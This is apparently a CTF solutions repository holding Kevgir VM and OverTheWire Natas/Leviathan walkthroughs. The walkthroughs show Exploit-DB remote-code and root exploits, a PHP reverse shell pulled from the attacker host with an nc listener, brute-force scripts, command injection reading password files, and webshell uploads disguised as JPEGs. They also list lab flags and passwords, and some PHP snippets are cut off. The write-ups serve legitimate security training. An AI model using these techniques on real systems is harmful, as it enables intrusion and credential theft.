Initial hash for this block 237 | $ib = $b = hash_hmac($a, $s . pack('N', $block), $p, true); 238 | # Perform block iterations 239 | for ($i = 1; $i < $c; $i++) 240 | # XOR each iterate 241 | $ib ^= ($b = hash_hmac($a, $b, $p, true)); 242 | $dk .= $ib; # Append iterated block 243 | } 244 | # Return derived key of correct length 245 | return substr($dk, 0, $kl); 246 | } 247 | 248 | We have now all the information to try a brute force. Here the pseudo-code 249 | 250 | foreach $pass in WORDLIST: 251 | if len($pass) >= 6: 252 | $hash = str_replace('+', '-', base64_encode(self::pbkdf2($pass, "travis" . "0@n6AraXM~L8pQ/&eOY=cHGw52l(q!"))) 253 | if $hash == "nT/y9QPmdknO/pu7QI4kNZK3yVk3h/Lan5M6mWLTE4I=" 254 | print "Password is $pass" 255 | exit 0 256 | exit 1 257 | 258 | Now, a good wordlist must be found. In the mean time, I'm trying with rockyou 259 | and [this script](./scripts/zenphoto-brute-force.php). 260 | 261 | ### Obtaining `root` access 262 | 263 | Having `admin` access on ZenPhoto seems to be useless if the target is 264 | becoming `root`. By googling, I found this PHP script 265 | 266 | https://www.exploit-db.com/exploits/18083 267 | 268 | Let's try it... 269 | 270 | $ wget https://www.exploit-db.com/download/18083 -O zp.php 271 | $ php zp.php canyoupwnme /zenphoto/ 272 | 273 | +-----------------------------------------------------------+ 274 | | Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX | 275 | +-----------------------------------------------------------+ 276 | 277 | zenphoto-shell# pwd 278 | /var/www/html/main/zenphoto/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc 279 | 280 | zenphoto-shell# id 281 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 282 | 283 | Nice! Let's getting and preparing a PHP reverse shell... 284 | 285 | $ wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz 286 | $ tar zxvf php-reverse-shell-1.0.tar.gz 287 | $ cd php-reverse-shell-1.0/ 288 | $ vim php-reverse-shell.php # set IP and PORT (1234) 289 | 290 | Uploading the shell on the target. On the attacker machine, setup a simple 291 | HTTP server 292 | 293 | $ cd php-reverse-shell-1.0/ 294 | $ ls -l 295 | -rw------- 1 1000 1004 62 May 26 2007 CHANGELOG 296 | -rw------- 1 1000 1004 17987 May 26 2007 COPYING.GPL 297 | -rw------- 1 1000 1004 308 May 26 2007 COPYING.PHP-REVERSE-SHELL 298 | -rwx------ 1 1000 1004 5491 May 26 2007 php-reverse-shell.php 299 | $ python -m SimpleHTTPServer 300 | Serving HTTP on 0.0.0.0 port 8000 ... 301 | 302 | On another shell, run the PHP script in order to upload the reverse shell 303 | 304 | $ php zp.php canyoupwnme /zenphoto/ 305 | 306 | +-----------------------------------------------------------+ 307 | | Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX | 308 | +-----------------------------------------------------------+ 309 | 310 | zenphoto-shell# pwd 311 | /var/www/html/main/zenphoto/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc 312 | 313 | zenphoto-shell# ls -l 314 | total 172 315 | -rwxr-xr-x 1 www-data www-data 1005 Feb 24 23:45 class.auth.php 316 | -rwxr-xr-x 1 www-data www-data 11465 Feb 24 23:45 class.file.php 317 | -rwxr-xr-x 1 www-data www-data 3574 Feb 24 23:45 class.history.php 318 | ... 319 | 320 | zenphoto-shell# wget http://10.0.100.245:8000/php-reverse-shell.php 321 | 322 | zenphoto-shell# ls -l 323 | total 180 324 | -rwxr-xr-x 1 www-data www-data 1005 Feb 24 23:45 class.auth.php 325 | -rwxr-xr-x 1 www-data www-data 11465 Feb 24 23:45 class.file.php 326 | -rwxr-xr-x 1 www-data www-data 3574 Feb 24 23:45 class.history.php 327 | ... 328 | -rw-r--r-- 1 www-data www-data 5491 May 26 2007 php-reverse-shell.php 329 | 330 | Ok! It's time to proceed. Let's start listening with `nc` 331 | 332 | $ nc -lnvp 1234 333 | listening on [any] 1234 ... 334 | 335 | Now on the browser, open the URL 336 | 337 | http://canyoupwnme/zenphoto/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/php-reverse-shell.php 338 | 339 | You should see on the `nc` shell something like this 340 | 341 | connect to [10.0.100.245] from (UNKNOWN) [10.0.100.195] 54005 342 | Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux 343 | ... 344 | $ 345 | 346 | Let's spawn now a `tty` shell 347 | 348 | $ python -c "import pty; pty.spawn('/bin/bash');" 349 | www-data@canyoupwnme:/$ cd /tmp 350 | www-data@canyoupwnme:/tmp$ mkdir ofs && cd ofs 351 | www-data@canyoupwnme:/tmp$ cd ofs 352 | www-data@canyoupwnme:/tmp/ofs$ wget https://www.exploit-db.com/download/39166 -O ofs.c 353 | www-data@canyoupwnme:/tmp/ofs$ gcc ofs.c 354 | www-data@canyoupwnme:/tmp/ofs$ ./a.out 355 | root@canyoupwnme:/tmp/ofs# id 356 | uid=0(root) gid=33(www-data) groups=0(root),33(www-data) 357 | 358 | Got it! :-D 359 | -------------------------------------------------------------------------------- /kevgir/004-joomla.md: -------------------------------------------------------------------------------- 1 | # Exploiting Joomla 2 | 3 | ## Port scanning 4 | 5 | Let's scan the target machine (`canyoupwnme`) with `nmap` 6 | 7 | $ nmap -A -T4 -sT -p1-65535 canyoupwnme 8 | ... 9 | 8081/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 10 | |_http-generator: Joomla! 1.5 - Open Source Content Management 11 | | http-methods: 12 | |_ Supported Methods: GET HEAD POST OPTIONS 13 | | http-robots.txt: 14 disallowed entries 14 | | /administrator/ /cache/ /components/ /images/ 15 | | /includes/ /installation/ /language/ /libraries/ /media/ 16 | |_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/ 17 | |_http-server-header: Apache/2.4.7 (Ubuntu) 18 | |_http-title: Welcome to the Frontpage 19 | ... 20 | 21 | Seems that Jooma v1.5 is up and running... 22 | 23 | ## Let's go Googling... 24 | 25 | After few seconds I found this one 26 | 27 | https://www.exploit-db.com/exploits/6234 28 | 29 | and it worked! The new credentials are 30 | 31 | admin : admin 32 | 33 | ## Prepare the target machine 34 | 35 | Joomla supports media uploading, so we can use this feature to upload a 36 | reverse shell. The first step is to enable the `php` extension as "safe" 37 | content. On the Joomla management interface, go to 38 | 39 | Site > Global Configuration > System > Media Settings 40 | 41 | and append `php` to the extensions list. 42 | 43 | ## Prepare the reverse shell 44 | 45 | On the attacker machine, prepare the "magic" PHP file 46 | 47 | $ wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz 48 | $ tar zxvf php-reverse-shell-1.0.tar.gz 49 | $ cd php-reverse-shell-1.0/ 50 | $ vim php-reverse-shell.php # set IP and PORT (1234) 51 | $ mv php-reverse-shell.php magic.php 52 | 53 | and start listening 54 | 55 | $ nc -lnvp 1234 56 | listening on [any] 1234 ... 57 | 58 | ## Upload the shell 59 | 60 | On the Joomla management interface, go to 61 | 62 | Site > Media Manager 63 | 64 | and upload the `magic.php` file. Then, go to 65 | 66 | http://canyoupwnme:8081/images/magic.php 67 | 68 | You should see something interesting on your terminal with `nc`... 69 | 70 | $ nc -lnvp 1234 71 | listening on [any] 1234 ... 72 | 73 | connect to [10.0.100.245] from canyoupwnme.pentest [10.0.100.195] 54878 74 | Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux 75 | ... 76 | 77 | ## Becoming `root` 78 | 79 | On the attacker machine, spawn a new `tty` shell 80 | 81 | $ python -c "import pty; pty.spawn('/bin/bash');" 82 | www-data@canyoupwnme:/$ 83 | 84 | Download, build and execute the local exploit 85 | 86 | www-data@canyoupwnme:/$ cd /tmp 87 | www-data@canyoupwnme:/tmp$ mkdir ofs && cd ofs 88 | www-data@canyoupwnme:/tmp$ cd ofs 89 | www-data@canyoupwnme:/tmp/ofs$ wget https://www.exploit-db.com/download/39166 -O ofs.c 90 | www-data@canyoupwnme:/tmp/ofs$ gcc ofs.c 91 | www-data@canyoupwnme:/tmp/ofs$ ./a.out 92 | root@canyoupwnme:/tmp/ofs# id 93 | uid=0(root) gid=33(www-data) groups=0(root),33(www-data) 94 | 95 | Got it! 96 | -------------------------------------------------------------------------------- /kevgir/README.md: -------------------------------------------------------------------------------- 1 | # Kevgir's solutions -------------------------------------------------------------------------------- /kevgir/scripts/redis-oracle.py: -------------------------------------------------------------------------------- 1 | import redis 2 | 3 | WORDLIST = "usernames.txt" 4 | PATH_TEMPLATE = "/home/%(user)s/.ssh" 5 | REDIS_HOST = '127.0.0.1' 6 | REDIS_PORT = 6379 7 | 8 | with open(WORDLIST, "r") as wl: 9 | usernames = wl.readlines() 10 | wl.close() 11 | 12 | r = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=0) 13 | 14 | i = 1.0 15 | paths = [] 16 | for username in usernames: 17 | u = username.strip('\r\n') 18 | path = PATH_TEMPLATE % {'user': u} 19 | try: 20 | r.config_set("dir", path) 21 | paths.append(path) 22 | print "Found: %s" % path 23 | except Exception: 24 | pass 25 | print ("Progress: %2.3f%% \r" % ((100*i)/len(usernames))), 26 | i += 1 27 | -------------------------------------------------------------------------------- /kevgir/scripts/zenphoto-brute-force.php: -------------------------------------------------------------------------------- 1 | = $min_pass_len ){ 31 | $hash = str_replace('+', '-', base64_encode(pbkdf2($pass, $user . $salt))); 32 | if ( strcmp($hash, $hash_ref) == 0 ) { 33 | echo "Found: " . $pass; 34 | exit(0); 35 | } else { 36 | echo "Trying with: " . $hash . "\r"; 37 | } 38 | } 39 | } 40 | fclose($fp); 41 | } 42 | ?> 43 | -------------------------------------------------------------------------------- /overthewire/.placeholder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/psmiraglia/ctf/19543d041861057431908a7d3d099d49b508b061/overthewire/.placeholder -------------------------------------------------------------------------------- /overthewire/leviathan/leviathan.md: -------------------------------------------------------------------------------- 1 | # Leviathan 2 | 3 | * leviathan0: leviathan0 4 | * leviathan1: rioGegei8m 5 | * leviathan2: ougahZi8Ta 6 | * leviathan3: Ahdiemoo1j 7 | * leviathan4: vuH0coox6m 8 | * leviathan5: Tith4cokei 9 | * leviathan6: UgaoFee4li 10 | * leviathan7: ahy7MaeBo9 11 | -------------------------------------------------------------------------------- /overthewire/natas/.gitignore: -------------------------------------------------------------------------------- 1 | *.html 2 | -------------------------------------------------------------------------------- /overthewire/natas/natas00.md: -------------------------------------------------------------------------------- 1 | # Natas0 2 | 3 | * user: `natas0` 4 | * pass: `natas0` 5 | * url: `http://natas0.natas.labs.overthewire.org` 6 | * flag: `gtVrDuiDfck831PqWsLEZy5gyDz1clto` 7 | 8 | ## Procedure 9 | 10 | 1. Get the page's source (e.g. `CTRL+U` on FF) 11 | 12 | 2. Look the HTML comment at line 16 13 | 14 | 15 | -------------------------------------------------------------------------------- /overthewire/natas/natas01.md: -------------------------------------------------------------------------------- 1 | # Natas1 2 | 3 | * user: `natas1` 4 | * pass: `gtVrDuiDfck831PqWsLEZy5gyDz1clto` 5 | * url: `http://natas1.natas.labs.overthewire.org` 6 | * flag: `ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi` 7 | 8 | ## Procedure 9 | 10 | 1. Get the page's source (e.g. `CTRL+U` on FF) 11 | 12 | 2. Look the HTML comment at line 17 13 | 14 | 15 | -------------------------------------------------------------------------------- /overthewire/natas/natas02.md: -------------------------------------------------------------------------------- 1 | # Natas2 2 | 3 | * user: `natas2` 4 | * pass: `ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi` 5 | * url: `http://natas2.natas.labs.overthewire.org` 6 | * flag: `sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14` 7 | 8 | ## Procedure 9 | 10 | 1. Get the page's source (e.g. `CTRL+U` on FF) 11 | 12 | 2. Statement *There is nothing on this page* is false! What about `` tag? 13 | 14 | 15 | 16 | 3. The image seems to be a one pixel image without any relevat info. Let's try 17 | if the URL `http://natas2.natas.labs.overthewire.or/files` give us 18 | something... 19 | 20 | 4. BINGO! The `/files` path is listable and we can see an interesting file 21 | named `users.txt`. Let's try to get its conent... 22 | 23 | $ curl -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/users.txt 24 | # username:password 25 | alice:BYNdCesZqW 26 | bob:jw2ueICLvT 27 | charlie:G5vCxkVV3m 28 | natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 29 | eve:zo4mJWyNj2 30 | mallory:9urtcpzBmH 31 | -------------------------------------------------------------------------------- /overthewire/natas/natas03.md: -------------------------------------------------------------------------------- 1 | # Natas3 2 | 3 | * user: `natas3` 4 | * pass: `sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14` 5 | * url: `http://natas3.natas.labs.overthewire.org` 6 | * flag: `Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ` 7 | 8 | ## Procedure 9 | 10 | 1. Get the page's source (e.g. `CTRL+U` on FF) 11 | 12 | 2. At line 15, there is an HTML comment with a hint (*Not even Google will 13 | find it this time...*). 14 | 15 | 3. How to disable page indexing? Simple! Use `Disallow` directive in 16 | `robots.txt` file. Let's try if it's available 17 | 18 | $ curl -u natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/robots.txt 19 | User-agent: * 20 | Disallow: /s3cr3t/ 21 | 22 | 4. Let's try to list `/s3cr3t/` path. Yep! Another `users.txt` file 23 | 24 | $ curl -u natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt 25 | natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ 26 | -------------------------------------------------------------------------------- /overthewire/natas/natas04.md: -------------------------------------------------------------------------------- 1 | # Natas4 2 | 3 | * user: `natas4` 4 | * pass: `Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ` 5 | * url: `http://natas4.natas.labs.overthewire.org` 6 | * flag: `iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq` 7 | 8 | ## Procedure 9 | 10 | 1. By getting the page's source code, we can see that there's nothing 11 | interesting. By clicking on `Refresh page`, page content changes from 12 | 13 | Access disallowed. You are visiting from "" while [...] 14 | 15 | to 16 | 17 | Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/" while [...] 18 | 19 | then if newly click on `Refresh page` it changes in 20 | 21 | Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/index.php" while [...] 22 | 23 | Seems that it's related to `Referer` HTTP header. Indeed, by repeating the 24 | procedure with a sniffer, we can see that `Referer` header is set. 25 | 26 | 2. The page suggests us that *authorized users should come only from [...]*. 27 | Let's try to set the `Referer` header to desired value 28 | (`http://natas5.natas.labs.overthewire.org/`) 29 | 30 | $ curl -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ --referer http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire.org 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 |

natas4

43 |

44 | 45 | Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq 46 |
47 |

Refresh page

48 |

49 | 50 | 51 | -------------------------------------------------------------------------------- /overthewire/natas/natas05.md: -------------------------------------------------------------------------------- 1 | # Natas5 2 | 3 | * user: `natas5` 4 | * pass: `iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq` 5 | * url: `http://natas5.natas.labs.overthewire.org` 6 | * flag: `aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1` 7 | 8 | ## Procedure 9 | 10 | 1. When accessing the page, the following message is received 11 | 12 | Access disallowed. You are not logged in 13 | 14 | It's common to use cookies to check if a user is logged in. So let's try 15 | with a sniffer (e.g. Wireshark) if specific cookie is required. 16 | 17 | 2. Bingo! When page is accessed, cookie `loggedin=0` is sent. Let's try to 18 | change it in 1 19 | 20 | $ curl -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq -b loggedin=1 http://natas5.natas.labs.overthewire.org/ 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 |

natas5

33 |

34 | Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

35 | 36 | 37 | 38 | Seems to work... 39 | -------------------------------------------------------------------------------- /overthewire/natas/natas06.md: -------------------------------------------------------------------------------- 1 | # Natas6 2 | 3 | * user: `natas6` 4 | * pass: `aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1` 5 | * url: `http://natas6.natas.labs.overthewire.org` 6 | * flag: `7z3hEENjQtflzgnT29q7wAvMNfZdh0i9` 7 | 8 | ## Procedure 9 | 10 | 1. By clicking on `View sourcecode` a PHP script is shown 11 | 12 | "; 19 | } else { 20 | print "Wrong secret"; 21 | } 22 | } 23 | ?> 24 | 25 | 2. The script says that `secret` parameter in the `POST` is checked 26 | against variable `$secret`. Furthermore, file `includes/secret.inc` 27 | is imported. Let's see what it contains 28 | 29 | $ curl -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/includes/secret.inc 30 | 33 | 34 | 3. Go back to the home page and try to provide the secret 35 | `FOEIUWGHFEEUHOFUOIU`. Bingo! 36 | 37 | Access granted. The password for natas7 is 38 | 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 39 | -------------------------------------------------------------------------------- /overthewire/natas/natas07.md: -------------------------------------------------------------------------------- 1 | # Natas7 2 | 3 | * user: `natas7` 4 | * pass: `7z3hEENjQtflzgnT29q7wAvMNfZdh0i9` 5 | * url: `http://natas7.natas.labs.overthewire.org` 6 | * flag: `DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe` 7 | 8 | ## Procedure 9 | 10 | 1. Page provides `Home` and `About` that link to 11 | 12 | http://natas7.natas.labs.overthewire.org/index.php?page=home 13 | 14 | and 15 | 16 | http://natas7.natas.labs.overthewire.org/index.php?page=about 17 | 18 | By taking a look in the source code there is the hint 19 | 20 | 21 | 22 | 2. Let's try to pass `/etc/natas_webpass/natas8` path as `page` value 23 | 24 | $ curl -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8 25 | 26 | [...] 27 | 28 |

natas7

29 |

30 | 31 | Home 32 | About 33 |
34 |
35 | DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe 36 | 37 | 38 |

39 | 40 | 41 | -------------------------------------------------------------------------------- /overthewire/natas/natas08.md: -------------------------------------------------------------------------------- 1 | # Natas8 2 | 3 | * user: `natas8` 4 | * pass: `DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe` 5 | * url: `http://natas8.natas.labs.overthewire.org` 6 | * flag: `W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl` 7 | 8 | ## Procedure 9 | 10 | 1. This seems to be similar to Natas6. Let's click on `View sourcecode` 11 | 12 | "; 23 | } else { 24 | print "Wrong secret"; 25 | } 26 | } 27 | ?> 28 | 29 | 2. Secret `3d3d516343746d4d6d6c315669563362` seems to be a HEX string. 30 | Decode it 31 | 32 | $ echo -n 3d3d516343746d4d6d6c315669563362 | perl -pe 's/([0-9a-f]{2})/chr hex $1/gie' 33 | ==QcCtmMml1ViV3b 34 | 35 | It's a reversed Base64 string. Let's try to decode it 36 | 37 | $ echo "==QcCtmMml1ViV3b" | rev | base64 -d 38 | oubWYf2kBq 39 | 40 | 3. Let's try to use `oubWYf2kBq` secret 41 | 42 | Access granted. The password for natas9 is 43 | W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl 44 | -------------------------------------------------------------------------------- /overthewire/natas/natas09.md: -------------------------------------------------------------------------------- 1 | # Natas9 2 | 3 | * user: `natas9` 4 | * pass: `W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl` 5 | * url: `http://natas9.natas.labs.overthewire.org` 6 | * flag: `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu` 7 | 8 | ## Procedure 9 | 10 | 1. Let's click on `View sourcecode` 11 | 12 |

13 | 		
24 |

25 | 26 | 2. The way to call `grep` command seems to be vulnerable to commands 27 | injection. Let's try to set value of `needle` parameter to 28 | `; ls -l ;` 29 | 30 | total 480 31 | drwxr-x--- 2 natas9 natas9 4096 Nov 14 10:32 . 32 | drwxr-xr-x 34 root root 4096 Nov 15 17:17 .. 33 | -rw-r----- 1 natas9 natas9 118 Nov 14 10:32 .htaccess 34 | -rw-r----- 1 natas9 natas9 42 Nov 14 10:32 .htpasswd 35 | -rw-r----- 1 natas9 natas9 460878 Nov 14 10:27 dictionary.txt 36 | -rw-r----- 1 natas9 natas9 1952 Nov 14 10:32 index-source.html 37 | -rw-r----- 1 natas9 natas9 1185 Nov 14 10:32 index.php 38 | -rw-r----- 1 natas9 natas9 1165 Nov 14 10:27 index.php.tmpl 39 | 40 | 3. Let's try the same path suggested in Natas7. By injecting the 41 | following code 42 | 43 | ; cat /etc/natas_webpass/natas10 ; 44 | 45 | the result is 46 | 47 | nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu 48 | -------------------------------------------------------------------------------- /overthewire/natas/natas10.md: -------------------------------------------------------------------------------- 1 | # Natas10 2 | 3 | * user: `natas10` 4 | * pass: `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu` 5 | * url: `http://natas10.natas.labs.overthewire.org` 6 | * flag: `U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK` 7 | 8 | ## Procedure 9 | 10 | 1. It seems to be similar to Natas9 but here chars `;`, `&` and `|` 11 | are not allowed. Let's try with other *magic* symbols... 12 | 13 | 2. By inserting `*` seems that something is mooving in the right way. 14 | Indeed, `grep` supports wildcards, so let's try with `.*`... 15 | 16 | 3. Well! Files in current dir are listed, but `dictionary.txt` is huge 17 | 18 | .htaccess:AuthType Basic 19 | .htaccess: AuthName "Authentication required" 20 | .htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd 21 | .htaccess: require valid-user 22 | .htpasswd:natas10:$1$sDWfJg4Y$ewf9jvw0ChWUA3KARHisg. 23 | dictionary.txt:African 24 | dictionary.txt:Africans 25 | dictionary.txt:Allah 26 | dictionary.txt:Allah's 27 | dictionary.txt:American 28 | ... 29 | 30 | 4. Let's try to exclude it by using `.* #`... 31 | 32 | .htaccess:AuthType Basic 33 | .htaccess: AuthName "Authentication required" 34 | .htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd 35 | .htaccess: require valid-user 36 | .htpasswd:natas10:$1$sDWfJg4Y$ewf9jvw0ChWUA3KARHisg. 37 | 38 | 5. Yep! I feel the smell of the flag! As is Natas7 and Natan9, now 39 | password should be in 40 | 41 | /etc/natas_webpass/natas11 42 | 43 | Let's try by injecting `.* /etc/natas_webpass/natas11 #` 44 | 45 | .htaccess:AuthType Basic 46 | .htaccess: AuthName "Authentication required" 47 | .htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd 48 | .htaccess: require valid-user 49 | .htpasswd:natas10:$1$sDWfJg4Y$ewf9jvw0ChWUA3KARHisg. 50 | /etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK 51 | -------------------------------------------------------------------------------- /overthewire/natas/natas11.md: -------------------------------------------------------------------------------- 1 | # Natas11 2 | 3 | * user: `natas11` 4 | * pass: `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu` 5 | * url: `http://natas11.natas.labs.overthewire.org` 6 | * flag: `EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3` 7 | 8 | ## Procedure 9 | 10 | 1. The hint *Cookies are protected with XOR encryption* is clear. We have to 11 | force an XOR-based encryption. From the theory, if `text ^ key = enc` then 12 | `enc ^ text = key`. 13 | 14 | 2. By sniffing, we can get a cookie called `data` with the following content 15 | 16 | ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV56QUcIaAw= 17 | 18 | Furthermore, by taking a look in the source code, there is the XOR-base 19 | encryption function 20 | 21 | function xor_encrypt($in) { 22 | $key = ''; 23 | $text = $in; 24 | $outText = ''; 25 | // Iterate through each character 26 | for($i=0;$i"no", "bgcolor"=>"#ffffff" ); 62 | $mydata_json = json_encode($mydata); 63 | $mydata_enc = xor_encrypt_2($mydata_json); 64 | echo $mydata_enc; 65 | ?> 66 | 67 | The result should be 68 | 69 | $ php myscript.php 70 | qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8'!nJq 71 | 72 | It seems to be a repetition of string `qw8J`. It should be the key... 73 | 74 | 4. Create a new function like this 75 | 76 | function xor_encrypt_2($in) { 77 | //$key = base64_decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV56QUcIaAw="); 78 | $key = "qw8J"; 79 | $text = $in; 80 | $outText = ''; 81 | 82 | // Iterate through each character 83 | for($i=0;$i"yes", "bgcolor"=>"#ffffff" ); 106 | $mydata_json = json_encode($mydata); 107 | $mydata_enc = xor_encrypt_2($mydata_json); 108 | $mydata_b64 = base64_encode($mydata_enc); 109 | echo $mydata_b64; 110 | ?> 111 | 112 | is should return 113 | 114 | $ php myscript.php 115 | ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK 116 | 117 | 5. Well, let's try to use it as cookie 118 | 119 | $ curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK -b data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK http://natas11.natas.labs.overthewire.org 120 | 121 | 122 | [cut] 123 | 124 |

natas11

125 |

126 | 127 | Cookies are protected with XOR encryption

128 | 129 | The password for natas12 is EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
130 | 131 | [cut] 132 | 133 | 134 | -------------------------------------------------------------------------------- /overthewire/natas/natas12.md: -------------------------------------------------------------------------------- 1 | # Natas12 2 | 3 | * user: `natas12` 4 | * pass: `EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3` 5 | * url: `http://natas12.natas.labs.overthewire.org` 6 | * flag: `jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY` 7 | 8 | ## Procedure 9 | 10 | 1. This level allows images, or better, files upload and provides a 11 | link to them. By taking a look in the source code, it's possible to 12 | understand how the destination path is generated. In few words, 13 | uploaded files will be available at 14 | 15 | /upload/. 16 | 17 | 2. While `` is random, `` is determined from 18 | the form's hidden field `filename`. So, let's try to verify it. 19 | Create a file called `image.php` and upload it 20 | 21 | $ echo "" > image.php 22 | $ curl -u natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 -F "MAX_FILE_SIZE=1000" -F "filename=image.php" -F "uploadedfile=@./image.php" http://natas12.natas.labs.overthewire.org 23 | 24 | 25 | [cut] 26 | 27 | 28 |

natas12

29 |

30 | The file upload/dlqovjn3kh.php has been uploaded

View sourcecode

31 |

32 | 33 | 34 | 35 | 3. Well. It seems to work. Let's try if [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) 36 | vulnerability is exploitable. If true, by clicking on 37 | 38 | http://natas12.natas.labs.overthewire.org/upload/dlqovjn3kh.php 39 | 40 | we should see the standard `phpinfo()` page. Of course, it works! 41 | 42 | 4. Let's try to access the file `/etc/natas_webpass/natas13`. Modify 43 | `image.php` with the following content 44 | 45 | 49 | 50 | and upload it 51 | 52 | $ curl -u natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 -F "MAX_FILE_SIZE=1000" -F "filename=image.php" -F "uploadedfile=@./image.php" http://natas12.natas.labs.overthewire.org 53 | 54 | 55 | [cut] 56 | 57 | 58 |

natas12

59 |

60 | The file upload/r0qf78xvfq.php has been uploaded

View sourcecode

61 |

62 | 63 | 64 | 65 | Now, let's try to execute our script 66 | 67 | $ curl -u natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 http://natas12.natas.labs.overthewire.org/upload/r0qf78xvfq.php 68 | jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY 69 | -------------------------------------------------------------------------------- /overthewire/natas/natas13.md: -------------------------------------------------------------------------------- 1 | # Natas13 2 | 3 | * user: `natas13` 4 | * pass: `jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY` 5 | * url: `http://natas13.natas.labs.overthewire.org` 6 | * flag: `Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1` 7 | 8 | ## Procedure 9 | 10 | 1. It seems to be the same approach of Natas12 but now, the file's 11 | signature is checked with the PHP function `exif_imagetype()`. 12 | According to documentation indeed, such function 13 | 14 | reads the first bytes of an image and checks its signature. 15 | 16 | 2. JPEG signature is `0xFF 0xD8 0xFF 0xE0`, so let's start by forging 17 | a JPEG file 18 | 19 | $ echo -e "\xFF\xD8\xFF\xE0" > image.php 20 | $ file image.php 21 | image.php: JPEG image data 22 | 23 | Now append the PHP code 24 | 25 | $ echo -n '' >> image.php 26 | $ file image.php 27 | image.php: JPEG image data 28 | 29 | 3. Upload the "image" as in Natas12 30 | 31 | $ curl -u natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY -F "MAX_FILE_SIZE=1000" -F "filename=image.php" -F "uploadedfile=@./image.php" http://natas13.natas.labs.overthewire.org 32 | 33 | 34 | [cut] 35 | 36 | 37 |

natas13

38 |

39 | For security reasons, we now only accept image files!

40 | 41 | The file upload/7q86uwt60z.php has been uploaded

View sourcecode

42 |

